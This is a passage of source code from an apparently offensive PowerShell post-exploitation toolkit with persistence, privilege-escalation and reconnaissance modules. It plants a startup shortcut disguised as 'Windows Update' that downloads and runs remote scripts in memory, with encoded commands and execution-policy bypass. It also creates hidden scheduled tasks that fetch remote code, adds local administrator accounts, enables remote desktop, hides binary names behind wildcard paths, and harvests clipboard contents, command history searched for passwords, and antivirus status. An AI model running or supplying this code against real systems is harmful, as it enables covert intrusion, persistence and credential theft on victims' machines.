15 | 16 | If the "-Encoded" parameter is appended to the command line, the downloadstring will be encoded and will use PowerShell's -EncodedCommand function to execute. 17 | 18 | .PARAMETER AddUser 19 | Adds a local user. If the [-Admin] parameter is specified, adds an existing user to the local Administrators group. Use the [-Delete] param to delete a user. (Requires Elevation) 20 | 21 | .PARAMETER EnableRdp 22 | Enables remote desktop on the target, and adds an existing user to the Remote Desktop users group. (Requires Elevation) 23 | 24 | .PARAMETER PsTask 25 | Generates a scheduled task that utilizes Net.Webclient Downloadstring method to a remote PowerShell script. 26 | 27 | .EXAMPLE 28 | PS> Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 29 | 30 | .EXAMPLE 31 | PS> Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 -Encoded 32 | 33 | .EXAMPLE 34 | PS> Invoke-Persistence -StartupLnk -Clean 35 | 36 | .EXAMPLE 37 | PS> Invoke-Persistence -AddUser -UserName user2 -password "p@a55wrd" 38 | 39 | .EXAMPLE 40 | Invoke-Persistence -EnableRdp -RdpUser tjones 41 | 42 | .EXAMPLE 43 | Invoke-Persistence -PsTask -PsUrl http://server/script.ps1 -TaskName "Test" -Time "00:01" 44 | 45 | .EXAMPLE 46 | Invoke-Persistence -PsTask -TaskName "Test" -Clean 47 | 48 | .NOTES 49 | Author: Fabrizio Siciliano (@0rbz_) 50 | 51 | #> 52 | 53 | [CmdletBinding()] 54 | param ( 55 | [Parameter(Position=1)] 56 | [Switch]$Help, 57 | [switch]$List, 58 | 59 | [Parameter(Mandatory = $False)] 60 | [Switch]$StartupLnk, 61 | [String]$PsUrl, 62 | [Switch]$Encoded, 63 | [Switch]$Clean, 64 | 65 | [Parameter(Mandatory = $False)] 66 | [Switch]$AddUser, 67 | [String]$UserName, 68 | [String]$Password, 69 | [Switch]$Admin, 70 | [Switch]$Delete, 71 | 72 | [Parameter(Mandatory = $False)] 73 | [Switch]$EnableRdp, 74 | [String]$RdpUser, 75 | 76 | [Parameter(Mandatory = $False)] 77 | [Switch]$PsTask, 78 | [String]$PsUrl2=[String]$PsUrl, 79 | [String]$TaskName, 80 | 
[String]$Time, 81 | [Switch]$Clean2=[Switch]$Clean 82 | 83 | ) 84 | 85 | $Rs1 = (-join ((65..90) + (97..122) | Get-Random -Count 5 | foreach {[char]$_})) 86 | 87 | if ($Help -eq $True) { 88 | Write @" 89 | 90 | ### Invoke-Persistence HELP ### 91 | ------------------------------- 92 | Available Invoke-Persistence Commands: 93 | -------------------------------------- 94 | |-----------------------------------------------------------------------------| 95 | | -StartupLnk [-Clean] [-PsUrl] File_url [-Encoded] | 96 | |-----------------------------------------------------------------------------| 97 | 98 | [*] Description: Drops a .LNK file in the current user's startup directory 99 | named "Windows Update" that executes a remotely hosted PowerShell script 100 | in memory (Net.WebClient DownloadString). If the "-Encoded" parameter is 101 | appended to the command line, the downloadstring will be encoded and will 102 | use PowerShell's -EncodedCommand function to execute. 103 | 104 | [*] Usage: Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 105 | [*] Usage: Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 -Encoded 106 | [*] Usage: Invoke-Persistence -StartupLnk -Clean (Removes startup lnk) 107 | 108 | 109 | [*] Mitre ATT&CK Ref: T1060 (Registry Run Keys / Startup Folder) 110 | 111 | |-----------------------------------------------------------------------------| 112 | | -Adduser [-Username] username [-Password] password [-Admin] [-Delete] | 113 | |-----------------------------------------------------------------------------| 114 | 115 | [*] Description: Adds a local user. If the [-Admin] parameter is specified, 116 | adds an existing user to the local Administrators group. Use the [-Delete] 117 | param to delete a user. 
(Requires Elevation) 118 | 119 | [*] Usage: Invoke-Persistence -AddUser -UserName user2 -Password "p@a55wrd" 120 | [*] Usage: Invoke-Persistence -AddUser -UserName user2 -Admin 121 | [*] Usage: Invoke-Persistence -Adduser -Username user2 -Delete 122 | 123 | |-----------------------------------------------------------------------------| 124 | | -EnableRdp [-RdpUser] user | 125 | |-----------------------------------------------------------------------------| 126 | 127 | [*] Description: Enables remote desktop on the target, and adds an existing 128 | user to the Remote Desktop users group. (Requires Elevation) 129 | 130 | [*] Usage: Invoke-Persistence -EnableRdp -RdpUser tjones 131 | 132 | |-----------------------------------------------------------------------------| 133 | | -PsTask [-PsUrl] url [-TaskName] Task Name [-Time] "time" | 134 | |-----------------------------------------------------------------------------| 135 | 136 | [*] Description: Generates a scheduled task that utilizes Net.Webclient 137 | Downloadstring method to a remote PowerShell script. 
138 | 139 | [*] Usage: Invoke-Persistence -PsTask -PsUrl http://server/script.ps1 -TaskName "Test" -Time "00:01" 140 | Usage: Invoke-Persistence -PsTask -TaskName "Test" -Clean 141 | 142 | \-----------------------------------------------------------------------------/ 143 | 144 | "@ 145 | } 146 | elseif ($List -eq $True) { 147 | Write @" 148 | 149 | Invoke-Persistence Brief Command Usage: 150 | --------------------------------------- 151 | Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 152 | Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 -Encoded 153 | Invoke-Persistence -AddUser -UserName user2 -Password "p@a55wrd" 154 | Invoke-Persistence -EnableRdp -RdpUser tjones 155 | Invoke-Persistence -PsTask -PsUrl http://server/script.ps1 -TaskName "Test" -Time "00:01" 156 | Invoke-Persistence -PsTask -TaskName "Test" -Clean 157 | 158 | "@ 159 | } 160 | 161 | if ($StartupLnk -and $PsUrl -and $Encoded) { 162 | 163 | $StartUp = "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup" 164 | 165 | $EncodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX (New-Object Net.Webclient).downloadstring('$PsUrl')")) 166 | 167 | $PSExe = "$pshome\powershell.exe" 168 | $Wss = New-Object -ComObject WScript.Shell 169 | $LnkCr = $Wss.CreateShortcut("$StartUp\Windows Update.lnk") 170 | $LnkCr.TargetPath = $PSExe 171 | $LnkCr.Arguments =@" 172 | -ep bypass -nop -EncodedCommand "$EncodedCommand" 173 | "@ 174 | $LnkCr.Description ="Windows Update" 175 | $LnkCr.IconLocation = "shell32.dll,14" 176 | $LnkCr.WorkingDirectory ="C:\Windows\System32" 177 | $LnkCr.Save() 178 | 179 | while ($(Test-Path "$StartUp\Windows Update.lnk")) { 180 | 181 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 182 | $Success = @" 183 | 184 | [+] Success! "Windows Update.lnk" Installed: 185 | $Startup\Windows Update.lnk file. 
186 | 187 | [+] LNK Target: 188 | $pshome\powershell.exe -ep bypass -nop -EncodedCommand "$EncodedCommand" 189 | 190 | "@ 191 | $h 192 | $Success 193 | $h 194 | return 195 | } 196 | } 197 | $StartUp = "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup" 198 | if ($StartupLnk -and $Clean -and $(Test-Path "$StartUp\Windows Update.lnk")) { 199 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 200 | Remove-Item "$Startup\Windows Update.lnk" 201 | $h 202 | Write "`n [+] Successfully removed $StartUp\Windows Update.lnk`n" 203 | $h 204 | return 205 | } 206 | elseif ($StartupLnk -and $Clean -and !$(Test-Path "$StartUp\Windows Update.lnk")) { 207 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 208 | $h 209 | Write "`n [-] $StartUp\Windows_Update.lnk doesn't exist!`n" 210 | $h 211 | return 212 | } 213 | elseif ($StartupLnk -and $PsUrl) { 214 | $StartUp = "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup" 215 | 216 | $PSExe = "$pshome\powershell.exe" 217 | $Wss = New-Object -ComObject WScript.Shell 218 | $LnkCr = $Wss.CreateShortcut("$StartUp\Windows Update.lnk") 219 | $LnkCr.TargetPath = $PSExe 220 | $LnkCr.Arguments =@" 221 | -ep bypass -nop "IEX (New-Object Net.Webclient).downloadstring('$PsUrl')" 222 | "@ 223 | $LnkCr.Description ="Windows Update" 224 | $LnkCr.IconLocation = "shell32.dll,14" 225 | $LnkCr.WorkingDirectory ="C:\Windows\System32" 226 | $LnkCr.Save() 227 | 228 | while ($(Test-Path "$StartUp\Windows Update.lnk")) { 229 | 230 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 231 | $Success = @" 232 | 233 | [+] Success! "Windows Update.lnk" Installed: 234 | $Startup\Windows Update.lnk file. 
235 | 236 | [+] LNK Target: 237 | $pshome\powershell.exe -ep bypass -nop "IEX (New-Object Net.Webclient).downloadstring('$PsUrl')" 238 | 239 | "@ 240 | $h 241 | $Success 242 | $h 243 | return 244 | } 245 | } 246 | $StartUp = "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup" 247 | if ($StartupLnk -and $Clean -and $(Test-Path "$StartUp\Windows Update.lnk")) { 248 | $h = "`n### Invoke-Persistence(StartupLnk) ###`n" 249 | Remove-Item "$Startup\Windows Update.lnk" 250 | $h 251 | Write "`n [+] Successfully removed $StartUp\Windows Update.lnk`n" 252 | $h 253 | return 254 | } 255 | 256 | elseif ($AddUser -and $Username -and $Password) { 257 | 258 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 259 | -match "S-1-5-32-544"))) { 260 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 261 | $h 262 | (net user $Username $Password /add /y) 263 | Write " [+] User `"$username`" added." 264 | $h 265 | } 266 | if (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 267 | -match "S-1-5-32-544"))) { 268 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 269 | $h 270 | Write " [-] This function requires elevation. Unable to add user `"$Username`"." 271 | $h 272 | return 273 | } 274 | } 275 | elseif ($Adduser -and $Username -and $Admin) { 276 | 277 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 278 | -match "S-1-5-32-544"))) { 279 | 280 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 281 | $h 282 | (net localgroup `"Administrators`" $UserName /add) 283 | Write " [+] User `"$Username`" added to the local Administrators group." 284 | $h 285 | } 286 | if (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 287 | -match "S-1-5-32-544"))) { 288 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 289 | $h 290 | Write " [-] This function requires elevation. Unable to add `"$username`" to admins group." 
291 | $h 292 | return 293 | } 294 | } 295 | elseif ($Adduser -and $Username -and $Delete) { 296 | 297 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 298 | -match "S-1-5-32-544"))) { 299 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 300 | $h 301 | (net user $username /delete) 302 | Write " [+] User `"$username`" deleted." 303 | $h 304 | } 305 | if (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 306 | -match "S-1-5-32-544"))) { 307 | $h = "`n### Invoke-Persistence(AddUser) ###`n" 308 | $h 309 | Write " [-] This function requires elevation. Unable to delete `"$Username`"." 310 | $h 311 | return 312 | } 313 | } 314 | elseif ($EnableRdp -and $RdpUser) { 315 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 316 | -match "S-1-5-32-544"))) { 317 | Try { 318 | $h = "`n### Invoke-Persistence(EnableRdp) ###`n" 319 | $h 320 | (reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f) 321 | (reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f) 322 | (netsh advfirewall firewall set rule group="remote desktop" new enable=yes) 323 | (net localgroup "Remote Desktop Users" $RdpUser /add) 324 | Write " [+] Successfully enabled Remote Desktop and added $RdpUser to the Remote Desktop users group." 325 | $h 326 | } 327 | Catch { 328 | Write " [!] Unknown Error." 329 | } 330 | } 331 | if (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 332 | -match "S-1-5-32-544"))) { 333 | $h = "`n### Invoke-Persistence(EnableRdp) ###`n" 334 | $h 335 | Write " [-] This function requires elevation. Unable to enable Remote Desktop." 
336 | $h 337 | } 338 | } 339 | if ($PsTask -and $PsUrl -and $TaskName -and $Time) { 340 | Try { 341 | $Wss = New-Object -ComObject WScript.Shell 342 | $LnkCr = $Wss.CreateShortcut("$env:appdata\$Rs1.lnk") 343 | $LnkCr.TargetPath = "C:\Windows\System32\schtasks.exe" 344 | $LnkCr.Arguments = "/Create /F /TN `"$TaskName`" /SC DAILY /ST $Time /TR ""powershell -ep Bypass -nop -w 1 \""iex ((New-Object Net.WebClient).DownloadString(\\\""'$PSUrl\\\""))\""" 345 | $LnkCr.Save() 346 | Start-Process -Wi Hidden -Fi "$env:appdata\$Rs1.lnk" 347 | Remove-Item "$env:appdata\$Rs1.lnk" 348 | Write " [+] Success." 349 | } 350 | Catch { 351 | Write " [!] Unknown Error." 352 | } 353 | } 354 | elseif ($PsTask -and $TaskName -and $Clean) { 355 | (C:\w?*n???s\s*3?\s?ht?s?s.?x? /Delete /TN $TaskName /f) 356 | } 357 | 358 | } 359 | 360 | -------------------------------------------------------------------------------- /modules/Invoke-Privesc.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Privesc { 2 | <# 3 | 4 | .SYNOPSIS 5 | Commands for either elevating to a higher integrity-level or elevating privileges via other means. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER UnquotedPaths 14 | Checks for auto start services configured without quotes, useful for identifying services vulnerable to unquoted service paths exploitation. 
15 | 16 | .EXAMPLE 17 | PS> Invoke-Privesc -UnquotedPaths 18 | 19 | .NOTES 20 | Author: Fabrizio Siciliano (@0rbz_) 21 | 22 | #> 23 | 24 | [CmdletBinding()] 25 | param ( 26 | [Parameter(Position=1)] 27 | [Switch]$Help, 28 | [switch]$List, 29 | 30 | [Parameter(Mandatory = $False)] 31 | [Switch]$UnquotedPaths 32 | ) 33 | 34 | if ($Help -eq $True) { 35 | 36 | Write @" 37 | 38 | ### Invoke-Privesc Help ### 39 | --------------------------- 40 | Available Invoke-Privesc Commands: 41 | ---------------------------------- 42 | |-----------------------------------------------------------------------------| 43 | | -UnquotedPaths | 44 | |-----------------------------------------------------------------------------| 45 | 46 | [?] Checks for auto start services configured without quotes, useful for 47 | identifying services vulnerable to unquoted service paths exploitation. 48 | 49 | [?] Usage: Invoke-Privesc -UnquotedPaths 50 | 51 | \-----------------------------------------------------------------------------/ 52 | 53 | "@ 54 | } 55 | elseif ($List -eq $True) { 56 | Write @" 57 | 58 | Invoke-Privesc Brief Command Usage: 59 | ----------------------------------- 60 | Invoke-Privesc -UnquotedPaths 61 | 62 | "@ 63 | } 64 | elseif ($UnquotedPaths) { 65 | 66 | Get-WmiObject win32_service | select PSConfiguration | Where {$_.PathName -notlike '*svchost*' -and $_.PathName -NotLike '*system32*' -and $_.StartMode -Like "Auto" -and $_.PathName -notmatch '"' -and $_.PathName -match ' '} 67 | 68 | Get-WmiObject win32_service | select PSConfiguration | Where {$_.PathName -notlike '*svchost*' -and $_.PathName -NotLike '*system32*' -and $_.StartMode -Like "Manual" -and $_.PathName -notmatch '"' -and $_.PathName -match ' '} 69 | 70 | Get-WmiObject win32_service | select PSConfiguration | Where {$_.PathName -notlike '*svchost*' -and $_.PathName -NotLike '*system32*' -and $_.StartMode -Like "Disabled" -and $_.PathName -notmatch '"' -and $_.PathName -match ' '} 71 | 72 | 73 | 74 | } 75 | } 
-------------------------------------------------------------------------------- /modules/Invoke-Sysinfo.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Sysinfo { 2 | <# 3 | 4 | .SYNOPSIS 5 | Obtains information about the system, its users, software and other functions. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER Os 14 | Retrieves basic operating system information. 15 | 16 | .PARAMETER Env 17 | Retrieves environment variable information. 18 | 19 | .PARAMETER Arch 20 | Retrieves system architecture. 21 | 22 | .PARAMETER Drives 23 | Retrieves any drives on the system. 24 | 25 | .PARAMETER Users 26 | Retrieves a list of local users. 27 | 28 | .PARAMETER LocalAdmins 29 | Retrieves a list of local administrators. 30 | 31 | .PARAMETER DomainAdmins 32 | If connected to an Active Directory domain, will retrieve a list of Domain Administrators. 33 | 34 | .PARAMETER Privs 35 | Displays the current users' privileges. 36 | 37 | .PARAMETER HotFixes 38 | Retrieves a list of hotfixes installed on the system. 39 | 40 | .PARAMETER CheckElevated 41 | Checks if current users' PowerShell process is elevated. 42 | 43 | .PARAMETER Shares 44 | Displays Shares 45 | 46 | .PARAMETER LoggedOn 47 | 48 | Displays current interactively logged-on users. 49 | 50 | .PARAMETER Apps 51 | 52 | Displays all installed applications. 53 | 54 | .PARAMETER Procs 55 | 56 | Displays running processes. 57 | 58 | .PARAMETER Services 59 | 60 | Displays services. 61 | 62 | .PARAMETER Tasks 63 | Displays scheduled tasks. 64 | 65 | .PARAMETER Av 66 | 67 | Displays currently installed Antivirus software. 68 | 69 | .PARAMETER LangMode 70 | Checks current PowerShell language mode. 71 | 72 | .PARAMETER PsVersion 73 | Checks PowerShell version for the current session. 74 | 75 | .PARAMETER DnsCache 76 | Dumps local client DNS Cache. 
77 | 78 | .PARAMETER PsHistory 79 | Obtains the PowerShell history from the ConsoleHost_history.txt file. 80 | 81 | .PARAMETER ClipBoard 82 | Dumps current clipboard contents. 83 | 84 | .PARAMETER RecentDocs 85 | Dumps recently accessed documents. 86 | 87 | .PARAMETER IpConfig 88 | Displays network interfaces information. 89 | 90 | .PARAMETER NetStat 91 | Displays all active network connections. 92 | 93 | .PARAMETER IEFavorites 94 | Dumps Internet Explorer Favorites / URLS 95 | 96 | .PARAMETER DumpAll 97 | Dumps all of the above modules into a sysinfo.txt file. 98 | 99 | .EXAMPLE 100 | PS> Invoke-Sysinfo -Av 101 | 102 | .EXAMPLE 103 | PS> Invoke-Sysinfo -PsHistory | Select-String "password" 104 | 105 | .EXAMPLE 106 | PS> Invoke-Sysinfo -Os | Out-File C:\temp\os.txt 107 | 108 | .NOTES 109 | Author: Fabrizio Siciliano (@0rbz_) 110 | 111 | #> 112 | 113 | [CmdletBinding()] 114 | param ( 115 | [Switch]$Help, 116 | [Switch]$List, 117 | [Switch]$Os, 118 | [Switch]$Env, 119 | [Switch]$Arch, 120 | [Switch]$Drives, 121 | [Switch]$Users, 122 | [Switch]$LocalAdmins, 123 | [Switch]$DomainAdmins, 124 | [Switch]$Privs, 125 | [Switch]$Hotfixes, 126 | [Switch]$CheckElevated, 127 | [Switch]$Shares, 128 | [Switch]$LoggedOn, 129 | [Switch]$Apps, 130 | [Switch]$Procs, 131 | [Switch]$Services, 132 | [Switch]$Tasks, 133 | [Switch]$Av, 134 | [Switch]$LangMode, 135 | [Switch]$PsVersion, 136 | [Switch]$DnsCache, 137 | [Switch]$PsHistory, 138 | [Switch]$ClipBoard, 139 | [Switch]$RecentDocs, 140 | [Switch]$IpConfig, 141 | [Switch]$NetStat, 142 | [Switch]$IEFavorites, 143 | [Switch]$DumpAll 144 | ) 145 | 146 | if ($Help -eq $true -or $List -eq $True) { 147 | 148 | Write @" 149 | 150 | ### Invoke-Sysinfo Help ### 151 | --------------------------- 152 | 153 | Invoke-Sysinfo [-command] 154 | 155 | Example: Invoke-Sysinfo -Os 156 | Example: Invoke-Sysinfo -Os | Out-File C:\temp\os.txt 157 | Example: Invoke-Sysinfo -Env 158 | Example: Invoke-Sysinfo -LangMode 159 | Example: Invoke-Sysinfo 
-PsHistory |Select-String "password" 160 | 161 | SYSINFO Command List: 162 | --------------------- 163 | |---------------------------------------------------------------------| 164 | 165 | -Os (Displays Basic Operating System Information) 166 | -Env (Displays Environment Variables Information) 167 | -Arch (Displays system architecture) 168 | -Drives (Displays current drives) 169 | -Users (Displays Users) 170 | -LocalAdmins (Displays local admins) 171 | -DomainAdmins (Displays Domain Admins) 172 | -Privs (Displays current user privileges) 173 | -HotFixes (Displays installed hotfixes) 174 | -CheckElevated (Checks if current user PS process is elevated) 175 | -Shares (Displays shared drives on the system) 176 | -LoggedOn (Displays currently interactively logged-on users) 177 | -Apps (Retrieves installed applications) 178 | -Procs (Displays current running processes) 179 | -Services (Displays current running and stopped services) 180 | -Tasks (Displays non-Microsoft scheduled tasks) 181 | -Av (Retrieves installed AntiVirus software information) 182 | -LangMode (Checks powershell current language mode) 183 | -PsVersion (Displays PowerShell version) 184 | -DnsCache (Dumps DNS Cache) 185 | -PsHistory (Dumps PowerShell Commandline History) 186 | -ClipBoard (Dumps Clipboard Contents) 187 | -RecentDocs (Dumps recently accessed files) 188 | -IpConfig (Dumps Network Interface Information) 189 | -NetStat (Dumps Active Network Connection information) 190 | -IEFavorites (Dumps Internet Explorer Favorites/Bookmarks) 191 | -DumpAll (Dumps all of the above modules information into 192 | %appdata%\sysinfo.txt) 193 | 194 | \---------------------------------------------------------------------/ 195 | 196 | "@ 197 | } 198 | 199 | elseif ($Os) { 200 | $h = "`n### Invoke-Sysinfo(Os) ###`n" 201 | $h 202 | get-wmiobject win32_operatingsystem | Select-Object Caption, Version, OSArchitecture, ServicePackMajorVersion, ServicePackMinorVersion, MUILanguages, LastBootUpTime, LocalDateTime, 
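NumberOfUsers, SystemDirectory
    $h
}
elseif ($Env) {
    $h = "`n### Invoke-Sysinfo(Env) ###`n"
    $h
    # Items from the Env: drive are DictionaryEntry objects, hence Key/Value.
    Get-ChildItem Env: | ft Key,Value
    $h
}
elseif ($Arch) {
    # NOTE(review): Win32_Processor.AddressWidth reflects the running OS
    # (a 32-bit OS on 64-bit hardware reports 32); DataWidth describes the CPU.
    if ($(Get-WmiObject -Query "SELECT * FROM Win32_Processor WHERE AddressWidth='64'")) {
        Write "`n [+] x64 Architecture detected.`n"
    }
    else {
        Write "`n [+] Likely x86.`n"
    }
}
elseif ($Drives) {
    $h = "`n### Invoke-Sysinfo(Drives) ###`n"
    $h
    # FileSystem provider only: Env:, HKLM:, Cert: and similar drives are skipped.
    Get-PSDrive | where {$_.Provider -like 'Microsoft.PowerShell.Core\FileSystem'} | ft Name,Root
    $h
}
elseif ($Users) {
    $h = "`n### Invoke-Sysinfo(Users) ###`n"
    $h
    Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'" | select name, fullname
    $h
}
elseif ($LocalAdmins) {
    $h = "`n### Invoke-Sysinfo(LocalAdmins) ###`n"
    $h
    # Fix: LocalAccount='True' pins the query to the machine's own
    # BUILTIN\Administrators group; on a domain-joined host a name-only
    # filter can also match the domain's group of the same name.
    # GetRelated only follows direct user members, so nested groups (e.g. a
    # domain group placed in the local group) are not expanded.
    (get-wmiobject win32_group -filter "Name='Administrators' AND LocalAccount='True'").GetRelated("win32_useraccount")
    $h
}

elseif ($DomainAdmins) {
    $h = "`n### Invoke-Sysinfo(DomainAdmins) ###`n"
    $h
    # The wildcard path resolves to C:\Windows\System32\net.exe at run time
    # (net group "Domain Admins" /domain). The wildcard only keeps the literal
    # name out of the script text: net.exe still runs as a child process, so
    # process-creation logging (Security 4688 / Sysmon 1) records it together
    # with its arguments. Requires a reachable domain controller.
    (C:\??*?\*3?\n?t.?x? group "Domain Admins" /domain)
    $h
}

elseif ($Privs) {
    $h = "`n### Invoke-Sysinfo(Privs) ###`n"
    $h
    # Resolves to whoami.exe /priv (same child-process visibility as above).
    (C:\??*?\*3?\wh??m?.?x? /priv)
    $h
}

elseif ($HotFixes) {
    $h = "`n### Invoke-Sysinfo(HotFixes) ###`n"
    $h
    # Fix: 'Sort-Object -Descending' without a property orders on the object
    # itself, which is not a meaningful order for hotfix records. Sort
    # newest-first by install date (entries with an empty InstalledOn sort last).
    (Get-Hotfix | Sort-Object -Property InstalledOn -Descending)
    $h
}

elseif ($CheckElevated) {
    $h = "`n### Invoke-Sysinfo(CheckElevated) ###`n"
    # Fix: the original tested whether the token's group list contains
    # S-1-5-32-544 (BUILTIN\Administrators). Under UAC an administrator's
    # filtered, medium-integrity token still carries that SID, flagged
    # "used for deny only", so a non-elevated shell of an admin user was
    # reported as elevated. IsInRole asks the token for effective membership
    # and returns $false for the deny-only case.
    $Identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $Principal = New-Object System.Security.Principal.WindowsPrincipal($Identity)
    $check = $Principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
    if ($check) {
        $h
        Write " [+] We're running as an elevated process."
        $h
    }
    else {
        $h
        Write " [-] Not Elevated."
        $h
    }
}

elseif ($Shares) {
    $h = "`n### Invoke-Sysinfo(Shares) ###`n"
    $h
    Get-WmiObject Win32_Share
    $h
}

elseif ($LoggedOn) {
    # https://social.technet.microsoft.com/Forums/forefront/en-US/6bf4194e-36d4-4fd1-96d6-40ebb9498424/powershell-script-list-all-remote-users-connected-via-rdp-with-details-like-remote-workstation
    $h = "`n### Invoke-Sysinfo(LoggedOn) ###`n"
    # Interactive logon is inferred from explorer.exe instances: one per
    # desktop session, owner = session user, process start = logon time.
    # NOTE(review): GetOwner() on another user's process needs sufficient
    # rights; where it is denied, User/Domain come back empty for that entry.
    $Explorer = (Get-WmiObject -Query "select * from Win32_Process where Name='explorer.exe'")

    if (!$Explorer) {
        $h
        Write " [-] No users currently interactively logged on."
        $h
    }
    else {
        foreach ($p in $Explorer) {
            $Username = $p.GetOwner().User
            $Domain = $p.GetOwner().Domain
            $h
            Write " User: $Domain\$Username`n Logon Time: $($p.ConvertToDateTime($p.CreationDate))"
            $h
        }
    }
}

elseif ($Apps) {
    $h = "`n### Invoke-Sysinfo(Apps) ###`n"
    $h
    # This lists the Program Files directory names, not the Uninstall registry
    # entries, so per-user and portable installs are not shown.
    # -ErrorAction: 'Program Files (x86)' does not exist on 32-bit Windows.
    Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' -ErrorAction SilentlyContinue | Format-Table Parent,Name,LastWriteTime
    $h
}

elseif ($Procs) {
    $h = "`n### Invoke-Sysinfo(Procs) ###`n"
    $h
    # svchost hosts are dropped to keep the list readable. Owner is empty where
    # GetOwner() is denied for another user's process.
    Get-WmiObject -Query 'Select * from Win32_Process' | where {$_.Name -notlike 'svchost*'} | Select Name, Handle, @{Label='Owner';Expression={$_.GetOwner().User}} | Format-Table -AutoSize
    $h
}

elseif ($Services) {
    $h = "`n### Invoke-Sysinfo(Services) ###`n"
    $h
    # Fix: the original used PathName.split('"')[1], which is $null for an
    # unquoted image path, so those services showed an empty Path. Take the
    # quoted image when there is one, otherwise show PathName as stored.
    Get-WmiObject win32_service | Select-Object Name, DisplayName, @{Name="Path"; Expression={ if ($_.PathName -match '^"([^"]+)"') { $matches[1] } else { $_.PathName } }}, State | Format-List
    $h
}

elseif ($Tasks) {
    $h = "`n### Invoke-Sysinfo(Tasks) ###`n"
    $h
    # Top level of the task store only (no -Recurse). NOTE(review): built-in
    # Microsoft tasks live in the 'Microsoft' subfolder, which is why the help
    # text describes this as non-Microsoft tasks.
    (Get-ChildItem C:\windows\system32\tasks |fl -Property Name,FullName)
    $h
}

elseif ($Av) {
    # https://stackoverflow.com/questions/33649043/powershell-how-to-get-antivirus-product-details#37842942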
[parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] 333 | [Alias('name')] 334 | $computername=$env:computername 335 | $AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername 336 | 337 | $ret = @() 338 | foreach($AntiVirusProduct in $AntiVirusProducts){ 339 | switch ($AntiVirusProduct.productState) { 340 | "262144" {$defstatus = "Up to date" ;$rtstatus = "Disabled"} 341 | "262160" {$defstatus = "Out of date" ;$rtstatus = "Disabled"} 342 | "266240" {$defstatus = "Up to date" ;$rtstatus = "Enabled"} 343 | "266256" {$defstatus = "Out of date" ;$rtstatus = "Enabled"} 344 | "393216" {$defstatus = "Up to date" ;$rtstatus = "Disabled"} 345 | "393232" {$defstatus = "Out of date" ;$rtstatus = "Disabled"} 346 | "393488" {$defstatus = "Out of date" ;$rtstatus = "Disabled"} 347 | "397312" {$defstatus = "Up to date" ;$rtstatus = "Enabled"} 348 | "397328" {$defstatus = "Out of date" ;$rtstatus = "Enabled"} 349 | "397584" {$defstatus = "Out of date" ;$rtstatus = "Enabled"} 350 | default {$defstatus = "Unknown" ;$rtstatus = "Unknown"} 351 | } 352 | #Create hash-table for each computer 353 | $ht = @{} 354 | $ht.Computername = $computername 355 | $ht.Name = $AntiVirusProduct.displayName 356 | $ht.'Product GUID' = $AntiVirusProduct.instanceGuid 357 | $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe 358 | $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe 359 | $ht.'Definition Status' = $defstatus 360 | $ht.'Real-time Protection Status' = $rtstatus 361 | 362 | #Create a new object for each computer 363 | $ret += New-Object -TypeName PSObject -Property $ht 364 | } 365 | Write "`n### Invoke-Sysinfo(Av) ###" 366 | Return $ret 367 | } 368 | 369 | elseif ($LangMode) { 370 | $h = "`n### Invoke-Sysinfo(LangMode) ###`n" 371 | $h 372 | $ExecutionContext.SessionState.LanguageMode 373 | $h 374 | } 375 | 376 | elseif ($PsVersion) { 377 | $h = "`n### Invoke-Sysinfo(PsVersion) 
